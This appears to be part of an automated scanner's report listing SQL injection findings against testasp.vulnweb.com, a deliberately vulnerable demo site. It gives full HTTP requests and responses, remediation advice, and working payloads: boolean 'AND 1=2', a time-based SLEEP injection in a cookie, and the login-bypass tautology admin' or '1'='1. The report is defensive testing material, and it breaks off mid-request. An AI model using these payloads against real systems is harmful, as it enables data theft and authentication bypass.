http://testasp.vulnweb.com/showforum.asp?id=2%20AND%201%3D2
Vulnerable Parameter
id
Detail
Boolean-based blind SQLi: TRUE branch within 0.5% of baseline (4030B, status 200), FALSE branch diverges 69.9% (1208B, status 500)
Payload
 AND 1=2
Detection Heuristic
Boolean-based blind SQLi: TRUE branch within 0.5% of baseline (4030B, status 200), FALSE branch diverges 69.9% (1208B, status 500)
AI Confidence
95%
HTTP Request
Full request
GET /showforum.asp?id=2%20AND%201%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:14:24 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary18. SQL Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-89 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 13:44:10
URL
http://testasp.vulnweb.com/showthread.asp?id=4%20AND%201%3D2
Vulnerable Parameter
id
Detail
Boolean-based blind SQLi: TRUE branch within 1.3% of baseline (3162B, status 200), FALSE branch diverges 61.3% (1208B, status 500)
Payload
 AND 1=2
Detection Heuristic
Boolean-based blind SQLi: TRUE branch within 1.3% of baseline (3162B, status 200), FALSE branch diverges 61.3% (1208B, status 500)
AI Confidence
95%
HTTP Request
Full request
GET /showthread.asp?id=4%20AND%201%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MAPOGGOBDIHBGGDNGBEKKGPB; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:44:08 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary19. SQL Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-89 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 13:43:38
URL
http://testasp.vulnweb.com/showthread.asp?id=0%20AND%201%3D2
Vulnerable Parameter
id
Detail
Boolean-based blind SQLi: TRUE branch within 0.6% of baseline (6970B, status 200), FALSE branch diverges 82.6% (1208B, status 500)
Payload
 AND 1=2
Detection Heuristic
Boolean-based blind SQLi: TRUE branch within 0.6% of baseline (6970B, status 200), FALSE branch diverges 82.6% (1208B, status 500)
AI Confidence
95%
HTTP Request
Full request
GET /showthread.asp?id=0%20AND%201%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=LFOOGGOBHIKFOLAIDMKDBJCF; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:43:36 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary20. SQL Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-89 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 13:39:49
URL
http://testasp.vulnweb.com/showthread.asp?id=1%20AND%201%3D2
Vulnerable Parameter
id
Detail
Boolean-based blind SQLi: TRUE branch within 1.3% of baseline (3071B, status 200), FALSE branch diverges 60.1% (1208B, status 500)
Payload
 AND 1=2
Detection Heuristic
Boolean-based blind SQLi: TRUE branch within 1.3% of baseline (3071B, status 200), FALSE branch diverges 60.1% (1208B, status 500)
AI Confidence
95%
HTTP Request
Full request
GET /showthread.asp?id=1%20AND%201%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=IHGLGGOBBLHMACJFGBJPGIFL; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:39:48 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary21. SQL Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-89 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 11:38:53
URL
http://testasp.vulnweb.com/showforum.asp?id=0
Vulnerable Parameter
ASPSESSIONIDCSDDASDC
Detail
Time-based blind injection: response took 4205ms (baseline 204ms, delta 4001ms)
Payload
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
Detection Heuristic
Time-based blind injection: response took 4205ms (baseline 204ms, delta 4001ms)
AI Confidence
95%
HTTP Request
Full request
GET /showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Default.asp
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:38:52 GMT
Content-Length: 3788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum Acunetix Web Vulnerability Scanner</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<div class="path">
			Acunetix Web Vulnerability Scanner
		</div>
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Thread</td>
        <td class="tableheader">Posts</td>
		<td class="tableheader">Posted by</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:25 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>2</a></div></td><td>2</td><td>admin</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>3</a></div></td><td>2</td><td>admin</td><td>11/9/2005 1:08:52 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>aaa</a></div></td><td>1</td><td>admin</td><td>11/9/2005 1:45:54 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>Спилы Деревьев
</a></div></td><td>1</td><td>Charlesitaxy</td><td>7/19/2026 3:22:51 PM</td></tr>
	</table>
	
	<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary22. SQL Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-89 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 11:37:43
URL
http://testasp.vulnweb.com/showforum.asp?id=0%20AND%201%3D2
Vulnerable Parameter
id
Detail
Boolean-based blind SQLi: TRUE branch within 1.1% of baseline (3828B, status 200), FALSE branch diverges 68.1% (1208B, status 500)
Payload
 AND 1=2
Detection Heuristic
Boolean-based blind SQLi: TRUE branch within 1.1% of baseline (3828B, status 200), FALSE branch diverges 68.1% (1208B, status 500)
AI Confidence
95%
HTTP Request
Full request
GET /showforum.asp?id=0%20AND%201%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Default.asp
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:37:41 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary23. SQL Injection in 'tfUName'/'tfUPass' login parameters
Severity: High  |  Confidence: Firm  |  CWE: CWE-89 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 14:11:34
URL
http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Detail
The login POST submits the classic authentication-bypass payload in both credential fields: the request body decodes to tfUName=admin' or '1'='1 and tfUPass=admin' or '1'='1. The server answers with a 302 redirect to /showforum.asp?id=2 rather than an authentication-failure page, which is consistent with the tautology being interpreted as SQL and bypassing the login check. This strongly indicates the credential parameters are concatenated into a SQL query without parameterisation.
AI Confidence
88%
Evidence
tfUName=admin%27+or+%271%27%3D%271&tfUPass=admin%27+or+%271%27%3D%271  ->  admin' or '1'='1 ; response: HTTP 302 Location: /showforum.asp?id=2
HTTP Request
Full request
POST /Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Content-Length: 69
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://testasp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Accept-Encoding: gzip, deflate, br
